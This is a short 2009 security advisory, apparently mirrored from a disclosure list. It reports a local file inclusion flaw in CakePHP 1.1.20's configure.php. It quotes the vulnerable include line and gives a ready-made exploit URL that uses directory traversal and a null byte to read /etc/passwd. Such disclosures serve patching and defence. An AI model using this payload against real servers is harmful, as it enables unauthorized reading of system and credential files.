Security Advisory: CakePHP 1.1.20 Local File Inclusion Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SECURITY] [DSA 1827-1] New ipplan packages fix cross-site scripting
  Juice Remote SQL Injection Vulnerability

From: Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date: 06.07.2009
Subject: CakePHP 1.1.20 Local File Inclusion Vulnerability


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       +
       +          CakePHP 1.1.20 Local File Inclusion Vulnerability
       +
       +                     Discovered by Cru3l.b0y
       +
       +                       WwW.DeltaHacking.Net
       +
       +
       +

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#################################################################################
##################
AUTHOR      : Cru3l.b0y
APPLICATION : CakePHP
VERSION     : 1.1.20
DOWNLOAD    :
http://cakeforge.org/frs/download.php/677/cake_1.1.20.7692.tar.gz/donation=comple
te
VENDOR      : http://cakeforge.org/
#################################################################################
##################

Vulnerable Code :
#################################################################################
##################
/cake/libs/configure.php

215    include(CONFIGS . $fileName . '.php');


[+]Exploit:
http://[t4rg3t]/[p4th]/cake/libs/configure.php?fileName=../../..
/etc/passwd%00
#################################################################################
##################

test server